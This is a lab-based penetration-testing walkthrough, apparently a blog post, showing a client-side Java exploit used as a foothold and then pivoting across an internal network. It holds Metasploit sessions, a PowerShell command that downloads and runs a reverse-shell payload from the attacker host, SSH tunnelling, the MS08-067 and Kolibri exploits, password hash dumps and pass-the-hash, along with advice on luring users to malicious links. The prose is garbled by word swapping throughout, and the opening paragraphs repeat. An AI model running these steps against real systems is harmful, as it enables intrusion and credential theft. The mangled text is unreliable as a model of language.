Hello together with welcome! Today I volition last walking yous through a scenario-based infrastructure hack. I am doing this for 2 reasons. (1) I was setting upwards some infrastructure tests inward my abode lab hence I mightiness equally good portion my efforts. (2) Showcasing client-side attacks equally an entry indicate to a corporate network. Me together with a distich of my colleagues were of late looking at the "Java Applet JMX Exploit" that was posted on pastebin here together with nosotros tested it out on a distich of VM's running IE8-10 (Win 7, Win 8), predictably all browsers poped calc. Today organisational perimeters are mostly good protected together with publicly available exploits simply don't hitting the proverbial mark. In my thought in that location are 2 entry points inward a corporate surroundings which pose to a greater extent than conduct chances than other assault vectors. (1) The spider web application infrastructure; the spider web is a genuinely complicated animate beingness together with amongst hence many technologies floating simply about mistakes hap (sqli, XSS, CSRF, broken authentication, SOAP logic errors, file upload, ascendance injection,...). (2) Client side attacks; targeted customer side attacks are extremely efficient, talented together with motivated attackers conduct maintain had a really high charge per unit of measurement of success (think of the carnage the Elderwood gang caused, delight bring some fourth dimension to read this).
Today nosotros volition run across how a compromised customer tin give the sack serve equally an entry indicate into the corporate network. We volition last using quite a few tactics to acchieve our goals similar metasploit pivoting, powershell, ssh tunneling together with pass-the-hash. Take a await at the network setup.
Network Layout:
Internet => 192.168.44.1/24
Corporate Network => 192.168.17.1/24
Clients:
H5N1 Attacker - BT5R3: 192.168.44.137
V1 Client - Win7 (Dual-Homed): 192.168.44.1 together with 192.168.17.1
V2 Legacy Web Server - XP SP1: 192.168.17.134
V3 Legacy Server - XP Pro SP3: 192.168.17.132
As I designed the lab I know precisely what vulnerabilities are present, today’s tutorial is mostly almost how the assailant tin give the sack propagate on the internal network. You volition also honour that I produce some things which aren't genuinely necessary but over again this is simply an chance to await at a multifariousness of techniques which are at the disposal of the attacker. Below yous tin give the sack run across a network diagram which should assist yous empathise the obstacles nosotros volition conduct maintain to overcome to accomplish our objectives (please forgive my pitiable Gimp skills!).
All nosotros demand to produce at nowadays is fox the unsuspecting user (V1) into browsing to our website.
Obviously this unsmooth exertion won't larn us really far but yous larn the thought right. H5N1 motivated assailant tin give the sack obfuscate the link together with arts and crafts a post service that looks similar it comes from a trusted source or render a seemingly compelling argue to view the website. This volition last the starting indicate for our infrastructure scenario.
As nosotros tin give the sack run across from the meterpreter session our host is dual-homed together with volition probable give us access to additional non routable hosts on the corporate network. First all the same nosotros are going to supercede our existing java_meterpreter amongst a proper meterpreter. As some of yous volition know the java_meterpreter doesn't incorporate all the available functionality. It also gives me the chance to showcase to cool tricks: (1) Inline poweshell code execution together with (2) metasploit session upgrading. First nosotros volition laid upwards a spider web server to host our musical rhythm out together with and hence nosotros volition utilization powershell to download together with execute our payload.
In add-on to our payload nosotros volition also last uploading plink.exe which is a ascendance describe version of Putty which volition allow us to create shh tunnels inward together with out of the corporate network should nosotros demand them.
As a concluding stride inward setting upwards our forrad base of operations of assault nosotros volition scan the internal non routable network for alive hosts together with add together a road to that network inward metasploit hence nosotros tin give the sack pin our attacks.
As I mentioned earlier the corporate network perimeter is mostly good protected. That same diligence is (generally) non applied to the internal network for a multifariousness of reasons. Upgrading OS'es costs allot of money, patching may crusade downtime no i is willing to sign off on together with mostly people consider the internal network to last a security place. Enter our (unrealistic) XP SP1 legacy HTTP server running a vulnerable version of Kolibri. Since nosotros added a road to the corporate network inward msf nosotros tin give the sack at nowadays forrad our traffic through V1 to the non routable hosts.
H5N1 chip of service enumeration volition divulge that the http-proxy is genuinely Kolibri HTTP Server. You could tunnel out the port together with browse to the site or await at the raw dump when enumerating amongst amap but I leave of absence that upwards to the diligent reader to play with. There is already an exploit acquaint for Kolibri inward metasploit but it solely supports XP SP3. It literally took me v minutes commencement to goal to launch a debugger on a essay system, await for the appropriate addresses on SP1 together with modification the exploit inward metasploit accordingly.
At this indicate in that location are a distich of things nosotros could do. In metasploit nosotros could run "search exploit/windows/local" together with run i of the local privilege escalation exploits through our existing session or nosotros could straight exploit MS08_067 since nosotros already conduct maintain a road to the network. We volition last doing something a chip to a greater extent than complicated though to demonstrate the powerfulness of ssh tunneling. We volition tunnel out port 445 on the remote host all the means dorsum to our assailant together with and hence launch MS08_067 on our local box through the tunnel to V2 together with larn a musical rhythm out back. This representative is a chip contrived but in that location are cases where ssh tunneling volition salve yous skin. Since V1 tin give the sack road connections to our assailant together with to V2 nosotros volition last using V1 equally the span for our tunnel.
For our concluding host nosotros volition await at some other mutual effect on internal networks. Often a workstation or server is installed together with and hence a snapshot is taken hence the configuration tin give the sack easily last replicated to other hosts. This is of course of teaching a major issue! When nosotros compromise a host together with dump the password hashes of the users nosotros tin give the sack utilization those to essay to authenticated to other hosts on the network. Lets essay to utilization the hashes nosotros recovered from V2 to authenticate against V3.
Today nosotros volition run across how a compromised customer tin give the sack serve equally an entry indicate into the corporate network. We volition last using quite a few tactics to acchieve our goals similar metasploit pivoting, powershell, ssh tunneling together with pass-the-hash. Take a await at the network setup.
Network Layout:
Internet => 192.168.44.1/24
Corporate Network => 192.168.17.1/24
Clients:
H5N1 Attacker - BT5R3: 192.168.44.137
V1 Client - Win7 (Dual-Homed): 192.168.44.1 together with 192.168.17.1
V2 Legacy Web Server - XP SP1: 192.168.17.134
V3 Legacy Server - XP Pro SP3: 192.168.17.132
As I designed the lab I know precisely what vulnerabilities are present, today’s tutorial is mostly almost how the assailant tin give the sack propagate on the internal network. You volition also honour that I produce some things which aren't genuinely necessary but over again this is simply an chance to await at a multifariousness of techniques which are at the disposal of the attacker. Below yous tin give the sack run across a network diagram which should assist yous empathise the obstacles nosotros volition conduct maintain to overcome to accomplish our objectives (please forgive my pitiable Gimp skills!).
V1 Client Side Foothold
Like I said earlier sophisticated attackers conduct maintain had dandy success at using customer side attacks to gain entry to the corporate network. Exploits such equally the recent Java JMX põrnikas offering such powerful weapons to the assailant amongst remote code execution across multiple browsers together with operating systems. H5N1 regular user may easily last tricked into browsing to a malicious link if he/she thinks the sender is trusted or is properly motivated. Time to launch our assault on the corporate network. First nosotros volition serve upwards the Java JMX exploit on our attackers box together with and hence nosotros volition essay to entice a pitiable employee to view our malicious website.msf > search JMX Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/multi/browser/java_jre17_jmxbean 2013-01-10 first-class Java Applet JMX Remote Code Execution exploit/multi/http/jboss_bshdeployer 2010-04-26 first-class JBoss JMX Console Beanshell Deployer WAR Upload together with Deployment exploit/multi/http/jboss_invoke_deploy 2007-02-20 first-class JBoss DeploymentFileRepository WAR Deployment (via JMXInvokerServlet) exploit/multi/http/jboss_maindeployer 2007-02-20 first-class JBoss JMX Console Deployer Upload together with Execute exploit/multi/misc/java_rmi_server 2011-10-15 first-class Java RMI Server Insecure Default Configuration Java Code Execution msf exploit(java_jre17_jmxbean) > show options Module options (exploit/multi/browser/java_jre17_jmxbean): Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yeah The local host to nous on. This must last an address on the local machine or 0.0.0.0 SRVPORT 8080 yeah The local port to nous on. SSL fake no Negotiate SSL for incoming connections SSLCert no Path to a custom SSL certificate (default is randomly generated) SSLVersion SSL3 no Specify the version of SSL that should last used (accepted: SSL2, SSL3, TLS1) URIPATH /JavaEveryday no The URI to utilization for this exploit (default is random) Payload options (java/meterpreter/reverse_http): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.44.137 yeah The local listener hostname LPORT 8080 yeah The local listener port Exploit target: Id Name -- ---- 0 Generic (Java Payload) msf exploit(java_jre17_jmxbean) > exploit [*] Exploit running equally background job. [*] Started HTTP contrary handler on http://192.168.44.137:8080/ [*] Using URL: http://0.0.0.0:8080/JavaEveryday [*] Local IP: http://192.168.44.137:8080/JavaEveryday [*] Server started.
All nosotros demand to produce at nowadays is fox the unsuspecting user (V1) into browsing to our website.
Obviously this unsmooth exertion won't larn us really far but yous larn the thought right. H5N1 motivated assailant tin give the sack obfuscate the link together with arts and crafts a post service that looks similar it comes from a trusted source or render a seemingly compelling argue to view the website. This volition last the starting indicate for our infrastructure scenario.
msf exploit(java_jre17_jmxbean) > exploit [*] Exploit running equally background job. [*] Started HTTP contrary handler on http://192.168.44.137:8080/ [*] Using URL: http://0.0.0.0:8080/JavaEveryday [*] Local IP: http://192.168.44.137:8080/JavaEveryday [*] Server started. [*] 192.168.44.1 java_jre17_jmxbean - treatment asking for /JavaEveryday/ [*] 192.168.44.1:58312 Request received for /favicon.ico... [*] 192.168.44.1:58312 Unknown asking to /favicon.ico GET /favicon.ico HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Host: 192.168.44.137:8080 Connection: Keep-Alive Content-Length: 0 ... [*] 192.168.44.1 java_jre17_jmxbean - treatment asking for /JavaEveryday/eHRimLIo.jar [*] 192.168.44.1 java_jre17_jmxbean - treatment asking for /JavaEveryday/eHRimLIo.jar [*] 192.168.44.1:58314 Request received for /INITJM... [*] Meterpreter session 1 opened (192.168.44.137:8080 -> 192.168.44.1:58314) at 2013-01-18 20:50:07 +0000 msf exploit(java_jre17_jmxbean) > sessions -l Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter java/java b33f @ Trident 192.168.17.133:8080 -> 192.168.17.1:53650 (192.168.17.1) msf exploit(java_jre17_jmxbean) > sessions -i 1 [*] Starting interaction amongst 1... meterpreter > sysinfo Computer : Trident OS : Windows seven 6.1 (x86) Meterpreter : java/java meterpreter > getuid Server username: b33f meterpreter > shell Process 1 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\b33f\Desktop>ipconfig ipconfig Windows IP Configuration Ethernet adapter VMware Network Adapter VMnet10: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::15ce:3f81:aaf6:3173%16 IPv4 Address. . . . . . . . . . . : 192.168.17.1 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : Ethernet adapter VMware Network Adapter VMnet8: Connection-specific DNS Suffix . : Link-local IPv6 Address . . . . . : fe80::a504:dea1:5746:e518%17 IPv4 Address. . . . . . . . . . . : 192.168.44.1 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . :
As nosotros tin give the sack run across from the meterpreter session our host is dual-homed together with volition probable give us access to additional non routable hosts on the corporate network. First all the same nosotros are going to supercede our existing java_meterpreter amongst a proper meterpreter. As some of yous volition know the java_meterpreter doesn't incorporate all the available functionality. It also gives me the chance to showcase to cool tricks: (1) Inline poweshell code execution together with (2) metasploit session upgrading. First nosotros volition laid upwards a spider web server to host our musical rhythm out together with and hence nosotros volition utilization powershell to download together with execute our payload.
root@bt: /Desktop# /etc/init.d/apache2 start * Starting spider web server apache2 [ OK ] root@bt: # netstat -atnp |grep apache2 Active Internet connections (servers together with established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program cry tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1467/apache2 root@bt: # msfpayload windows/shell/reverse_tcp lport=9988 lhost=192.168.44.137 X > /var/www/funz.exe Created past times msfpayload (http://www.metasploit.com). Payload: windows/shell/reverse_tcp Length: 290 Options: {"lport"=>"9988", "lhost"=>"192.168.44.137"} root@bt: # locate plink.exe /pentest/windows-binaries/tools/plink.exe root@bt: # cp /pentest/windows-binaries/tools/plink.exe /var/www/ root@bt: /Desktop# ls -la /var/www/ full 2100 drwxr-xr-x three root root 4096 2013-01-18 01:28 . drwxr-xr-x sixteen root root 4096 2011-06-08 14:51 .. -rw-r--r-- 1 root root 73802 2013-01-18 01:27 funz.exe -rw-r--r-- 1 root root 177 2011-05-10 17:01 index.html -rwxrw-rw- 1 root root 1667584 2011-06-30 14:52 ncat.exe -rwxrw-rw- 1 root root 381816 2010-04-27 12:04 PsExec.exe drwxr-xr-x 2 root root 4096 2011-05-10 17:01 wstool
In add-on to our payload nosotros volition also last uploading plink.exe which is a ascendance describe version of Putty which volition allow us to create shh tunnels inward together with out of the corporate network should nosotros demand them.
# First nosotros volition background our meterpreter session (Ctrl+Z) till nosotros driblet dorsum into msfconsole together with laid upwards a # listener for our payload. msf exploit(java_jre17_jmxbean) > use multi/handler msf exploit(handler) > set payload windows/shell/reverse_tcp payload => windows/shell/reverse_tcp msf exploit(handler) > set lport 9988 lport => 9988 msf exploit(handler) > set lhost 192.168.44.137 lhost => 192.168.44.137 msf exploit(handler) > exploit -j [*] Exploit running equally background job. [*] Started contrary handler on 192.168.44.137:9988 [*] Starting the payload handler... # Ok at nowadays lets log dorsum into our master copy meterpreter sessions together with utilization powershell to download our files # together with execute our payload. msf exploit(handler) > sessions -i 1 [*] Starting interaction amongst 1... meterpreter > shell Process 1 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\b33f\Desktop>md EvilHacker md EvilHacker # This volition brand the folder hidden together with won't fifty-fifty demo upwards if "Show Hidden Files together with Folders" selection is # enabled. C:\Users\b33f\Desktop>attrib +s +h "C:\Users\b33f\Desktop\EvilHacker" attrib +s +h "C:\Users\b33f\Desktop\EvilHacker" C:\Users\b33f\Desktop>cd EvilHacker cd EvilHacker # This is all inward i line C:\Users\b33f\Desktop\EvilHacker>cmd /c "PowerShell (New-Object System.Net.WebClient).DownloadFile ('http://192.168.44.137/funz.exe','funz.exe');(New-Object System.Net.WebClient).DownloadFile ('http://192.168.44.137/plink.exe','plink.exe');Start-Process 'funz.exe'" # We similar a shot larn notified of the incoming musical rhythm out past times our handler. [*] Encoded phase amongst x86/shikata_ga_nai [*] Sending encoded phase (267 bytes) to 192.168.44.1 C:\Users\b33f\Desktop\EvilHacker>^Z Background channel 1? [y/N] y meterpreter > Background session 1? [y/N] y msf exploit(handler) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter java/java b33f @ Trident 192.168.44.137:8080 -> 192.168.44.1:58314 (192.168.44.1) 2 musical rhythm out windows 192.168.44.137:9988 -> 192.168.44.1:58736 (192.168.44.1) # We tin give the sack utilization the "sessions -u" selection to upgrade our musical rhythm out to a proper meterpreter session. msf exploit(handler) > sessions -u 2 [*] Started contrary handler on 192.168.44.137:9988 [*] Starting the payload handler... [*] Command Stager progress - 1.66% done (1699/102108 bytes) [*] Command Stager progress - 3.33% done (3398/102108 bytes) [*] Command Stager progress - 4.99% done (5097/102108 bytes) [*] Command Stager progress - 6.66% done (6796/102108 bytes) [...Snip...] [*] Command Stager progress - 96.51% done (98542/102108 bytes) [*] Command Stager progress - 98.15% done (100216/102108 bytes) [*] Command Stager progress - 99.78% done (101888/102108 bytes) [*] Command Stager progress - 100.00% done (102108/102108 bytes) msf exploit(handler) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- 1 meterpreter java/java b33f @ Trident 192.168.44.137:8080 -> 192.168.44.1:58314 (192.168.44.1) 2 musical rhythm out windows 192.168.44.137:9988 -> 192.168.44.1:58736 (192.168.44.1) three meterpreter x86/win32 Trident\b33f @ TRIDENT 192.168.44.137:9988 -> 192.168.44.1:58770 (192.168.44.1) # Lets kill off the sessions nosotros don't demand anymore. msf exploit(handler) > sessions -k 1 [*] Killing session 1 [*] 192.168.44.1 - Meterpreter session 1 closed. msf exploit(handler) > sessions -k 2 [*] Killing session 2 [*] 192.168.44.1 - Command musical rhythm out session 2 closed.
As a concluding stride inward setting upwards our forrad base of operations of assault nosotros volition scan the internal non routable network for alive hosts together with add together a road to that network inward metasploit hence nosotros tin give the sack pin our attacks.
meterpreter > run arp_scanner -r 192.168.17.1/24 [*] ARP Scanning 192.168.17.1/24 [*] IP: 192.168.17.1 MAC 00:50:56:c0:00:01 [*] IP: 192.168.17.134 MAC 00:0c:29:33:39:21 [*] IP: 192.168.17.132 MAC 00:0c:29:71:74:f7 msf exploit(handler) > route add together 192.168.17.1 255.255.255.0 3 [*] Route added msf exploit(handler) > route print Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 192.168.17.1 255.255.255.0 Session 3
V2 Legacy Web Server
As I mentioned earlier the corporate network perimeter is mostly good protected. That same diligence is (generally) non applied to the internal network for a multifariousness of reasons. Upgrading OS'es costs allot of money, patching may crusade downtime no i is willing to sign off on together with mostly people consider the internal network to last a security place. Enter our (unrealistic) XP SP1 legacy HTTP server running a vulnerable version of Kolibri. Since nosotros added a road to the corporate network inward msf nosotros tin give the sack at nowadays forrad our traffic through V1 to the non routable hosts.
msf exploit(handler) > nmap -sS -T5 -v 192.168.17.134 [*] exec: nmap -sS -T5 -v 192.168.17.134 Starting Nmap 5.51SVN ( http://nmap.org ) at 2013-01-18 21:25 GMT Initiating Ping Scan at 21:25 Scanning 192.168.17.134 [3 ports] Completed Ping Scan at 21:25, 0.01s elapsed (1 full hosts) Initiating Parallel DNS resolution of 1 host. at 21:25 Completed Parallel DNS resolution of 1 host. at 21:25, 0.03s elapsed Initiating SYN Stealth Scan at 21:25 Scanning 192.168.17.134 [1000 ports] Discovered opened upwards port 135/tcp on 192.168.17.134 Discovered opened upwards port 8080/tcp on 192.168.17.134 Discovered opened upwards port 1025/tcp on 192.168.17.134 Discovered opened upwards port 139/tcp on 192.168.17.134 Discovered opened upwards port 445/tcp on 192.168.17.134 Discovered opened upwards port 5000/tcp on 192.168.17.134 Completed SYN Stealth Scan at 21:25, 3.28s elapsed (1000 full ports) Nmap scan written report for 192.168.17.134 Host is upwards (1.0s latency). PORT STATE SERVICE 135/tcp opened upwards msrpc 139/tcp opened upwards netbios-ssn 445/tcp opened upwards microsoft-ds 1025/tcp opened upwards NFS-or-IIS 5000/tcp opened upwards upnp 8080/tcp opened upwards http-proxy MAC Address: 00:0C:29:33:39:21 (VMware) Read information files from: /opt/framework/share/nmap Nmap done: 1 IP address (1 host up) scanned inward 3.53 seconds Raw packets sent: 1527 (67.164KB) | Rcvd: 543 (21.744KB)
H5N1 chip of service enumeration volition divulge that the http-proxy is genuinely Kolibri HTTP Server. You could tunnel out the port together with browse to the site or await at the raw dump when enumerating amongst amap but I leave of absence that upwards to the diligent reader to play with. There is already an exploit acquaint for Kolibri inward metasploit but it solely supports XP SP3. It literally took me v minutes commencement to goal to launch a debugger on a essay system, await for the appropriate addresses on SP1 together with modification the exploit inward metasploit accordingly.
msf exploit(handler) > use exploit/windows/http/kolibri_http msf exploit(kolibri_http) > set rhost 192.168.17.134 rhost => 192.168.17.134 msf exploit(kolibri_http) > set rport 8080 rport => 8080 # Take aid to laid a bind payload equally the host has no means to road dorsum to our attacker. msf exploit(kolibri_http) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp msf exploit(kolibri_http) > show options Module options (exploit/windows/http/kolibri_http): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no Use a proxy chain RHOST 192.168.17.134 yeah The target address RPORT 8080 yeah The target port VHOST no HTTP server virtual host Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC procedure yeah Exit technique: seh, thread, process, none LPORT 4444 yeah The nous port RHOST 192.168.17.134 no The target address Exploit target: Id Name -- ---- 0 Windows XP sp3 msf exploit(kolibri_http) > exploit msf exploit(handler) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- three meterpreter x86/win32 Trident\b33f @ TRIDENT 192.168.44.137:9988 -> 192.168.44.1:58770 (192.168.44.1) 4 meterpreter x86/win32 B33F-URLVV9CUV5\user1 @ B33F-URLVV9CUV5 192.168.44.137-192.168.44.1:0 -> 192.168.17.134:4444 (192.168.17.134) msf exploit(handler) > sessions -i 4 [*] Starting interaction amongst 4... meterpreter > getuid Server username: B33F-URLVV9CUV5\user1 meterpreter > sysinfo Computer : B33F-URLVV9CUV5 OS : Windows XP (Build 2600, Service Pack 1). Architecture : x86 System Language : en_US Meterpreter : x86/win32 # Seems similar user1 is a depression privilege user together with won't last able to give us SYSTEM story access to the box meterpreter > hashdump [-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect. meterpreter > getsystem [-] priv_elevate_getsystem: Operation failed: Access is denied.
At this indicate in that location are a distich of things nosotros could do. In metasploit nosotros could run "search exploit/windows/local" together with run i of the local privilege escalation exploits through our existing session or nosotros could straight exploit MS08_067 since nosotros already conduct maintain a road to the network. We volition last doing something a chip to a greater extent than complicated though to demonstrate the powerfulness of ssh tunneling. We volition tunnel out port 445 on the remote host all the means dorsum to our assailant together with and hence launch MS08_067 on our local box through the tunnel to V2 together with larn a musical rhythm out back. This representative is a chip contrived but in that location are cases where ssh tunneling volition salve yous skin. Since V1 tin give the sack road connections to our assailant together with to V2 nosotros volition last using V1 equally the span for our tunnel.
# First commencement your ssh server on BackTrack. root@bt: # /etc/init.d/ssh start Rather than invoking init scripts through /etc/init.d, utilization the service(8) utility, e.g. service ssh commencement Since the script yous are attempting to invoke has been converted to an Upstart job, yous may also utilization the start(8) utility, e.g. commencement ssh ssh start/running, procedure 4985 # Drop dorsum into a musical rhythm out on V1 together with commencement the tunnel. It volition await similar yous driblet out of metasploit dorsum # into a terminal but thats normal since yous opening a ssh shell. # # Tunnel Syntax: plink -l username -pw "password" -R attacker_port:victim_ip:victim_port attacker_ip C:\Users\b33f\Desktop\EvilHacker>plink -l root -pw "s3cr3tpa$$word" -R 445:192.168.17.134:445 192.168.44.137 plink -l root -pw "s3cr3tpa$$word" -R 445:192.168.17.134:445 192.168.44.137 Linux bt 3.2.6 #1 SMP Friday February 17 10:40:05 EST 2012 i686 GNU/Linux System information equally of Sabbatum January xix 19:56:44 GMT 2013 System load: 0.01 Processes: 130 Usage of /: 28.6% of 47.82GB Users logged in: 1 Memory usage: 16% IP address for eth0: 192.168.44.137 Swap usage: 0% Graph this information together with create produce this scheme at https://landscape.canonical.com/ Last login: Sabbatum January xix 19:25:22 2013 from 192.168.44.1 root@bt: # netstat -antp |grep 445 netstat -antp |grep 445 tcp 0 0 127.0.0.1:445 0.0.0.0:* LISTEN 3486/2 tcp6 0 0 ::1:445 :::* LISTEN 3486/2 # In a novel terminal opened upwards up msfconsole. First nosotros volition position the opperating scheme to verify the tunnel # plant (could also last done amongst nmap script scan or enum4linux) together with and hence nosotros volition launch a meterpreter # bind payload through the tunnel. msf exploit(ms08_067_netapi) > use scanner/smb/smb_version msf auxiliary(smb_version) > show options Module options (auxiliary/scanner/smb/smb_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yeah The target address arrive at or CIDR identifier SMBDomain WORKGROUP no The Windows domain to utilization for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate equally THREADS 1 yeah The number of concurrent threads msf auxiliary(smb_version) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 msf auxiliary(smb_version) > exploit [*] 127.0.0.1:445 is running Windows XP Service Pack 0 / 1 (language: English) (name:B33F-URLVV9CUV5) (domain:WORKGROUP) [-] 127.0.0.1: ActiveRecord::RecordInvalid Validation failed: Address is reserved [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf > search ms08_067 Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC dandy Microsoft Server Service Relative Path Stack Corruption # Take aid to laid rhost to 127.0.0.1. msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > show options Module options (exploit/windows/smb/ms08_067_netapi): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 127.0.0.1 yeah The target address RPORT 445 yeah Set the SMB service port SMBPIPE BROWSER yeah The pipage cry to utilization (BROWSER, SRVSVC) Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yeah Exit technique: seh, thread, process, none LPORT 4444 yeah The nous port RHOST 127.0.0.1 no The target address Exploit target: Id Name -- ---- 2 Windows XP SP0/SP1 Universal msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Attempting to trigger the vulnerability... # We won't larn equally musical rhythm out equally nosotros are launching the assault on our localhost but lets become dorsum to our tunnel, # unopen it together with background till nosotros are dorsum inward msfconsole. root@bt: # exit larn out logout Using username "root". C:\Users\b33f\Desktop>^Z Background channel 1? [y/N] y meterpreter > Background session 4? [y/N] # Set upwards a handler for the meterpreter bind musical rhythm out that is waiting for us. msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC procedure yeah Exit technique: seh, thread, process, none LPORT 4444 yeah The nous port RHOST 192.168.17.134 no The target address Exploit target: Id Name -- ---- 0 Wildcard Target msf exploit(handler) > exploit [*] Started bind handler [*] Starting the payload handler... [*] Sending phase (752128 bytes) to 192.168.17.134 meterpreter > Background session 5? [y/N] # As yous tin give the sack run across nosotros at nowadays conduct maintain SYSTEM story access to V2. msf exploit(handler) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- three meterpreter x86/win32 Trident\b33f @ TRIDENT 192.168.44.137:9988 -> 192.168.44.1:58770 (192.168.44.1) 4 meterpreter x86/win32 B33F-URLVV9CUV5\user1 @ B33F-URLVV9CUV5 192.168.44.137-192.168.44.1:0 -> 192.168.17.134:4444 (192.168.17.134) 5 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ B33F-URLVV9CUV5 192.168.44.137:46585 -> 192.168.17.134:4444 (192.168.17.134) meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:17e6ed3ae4ea6164cf94ce448039c13b:1834e6a12f358bd93bfdd45b5395eea1::: Owner:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:69be3606bb00c489551eb44859048a8c::: user1:1004:e52cac67419a9a2238f10713b629b565:5835048ce94ad0564e29a924a03510ef:::
V3 Legacy Server
For our concluding host nosotros volition await at some other mutual effect on internal networks. Often a workstation or server is installed together with and hence a snapshot is taken hence the configuration tin give the sack easily last replicated to other hosts. This is of course of teaching a major issue! When nosotros compromise a host together with dump the password hashes of the users nosotros tin give the sack utilization those to essay to authenticated to other hosts on the network. Lets essay to utilization the hashes nosotros recovered from V2 to authenticate against V3.
msf exploit(psexec) > show options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 192.168.17.132 yeah The target address RPORT 445 yeah Set the SMB service port SHARE ADMIN$ yeah The portion to connect to, tin give the sack last an admin portion (ADMIN$, C$,...) or a normal read/write folder portion SMBDomain WORKGROUP no The Windows domain to utilization for authentication SMBPass aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 no The password for the specified username SMBUser Administrator no The username to authenticate equally Payload options (windows/meterpreter/bind_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC procedure yeah Exit technique: seh, thread, process, none LPORT 5566 yeah The nous port RHOST 192.168.17.132 no The target address Exploit target: Id Name -- ---- 0 Automatic msf exploit(psexec) > exploit [*] Connecting to the server... [*] Started bind handler [*] Authenticating to 192.168.17.132:445|WORKGROUP equally user 'Administrator'... [*] Uploading payload... [*] Created \OkddXwLq.exe... [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.17.132[\svcctl] ... [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.17.132[\svcctl] ... [*] Obtaining a service director handle... [*] Creating a novel service (HRyeauAf - "MRhLxJcCrdBvQlOSnQSjdnYROxRe")... [*] Closing service handle... [*] Opening service... [*] Starting the service... [*] Removing the service... [*] Closing service handle... [*] Sending phase (752128 bytes) [*] Deleting \OkddXwLq.exe... [*] Meterpreter session vi opened (192.168.44.137-192.168.44.1:0 -> 192.168.17.132:5566) at 2013-01-19 21:22:04 +0000 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter > Background session 6? [y/N] msf exploit(psexec) > sessions Active sessions =============== Id Type Information Connection -- ---- ----------- ---------- three meterpreter x86/win32 Trident\b33f @ TRIDENT 192.168.44.137:9988 -> 192.168.44.1:58770 (192.168.44.1) 4 meterpreter x86/win32 B33F-URLVV9CUV5\user1 @ B33F-URLVV9CUV5 192.168.44.137-192.168.44.1:0 -> 192.168.17.134:4444 (192.168.17.134) 5 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ B33F-URLVV9CUV5 192.168.44.137:46585 -> 192.168.17.134:4444 (192.168.17.134) vi meterpreter x86/win32 NT AUTHORITY\SYSTEM @ B33F-E95CE571A1 192.168.44.137-192.168.44.1:0 -> 192.168.17.132:5566 (192.168.17.132) msf exploit(psexec) > ...Game Over...
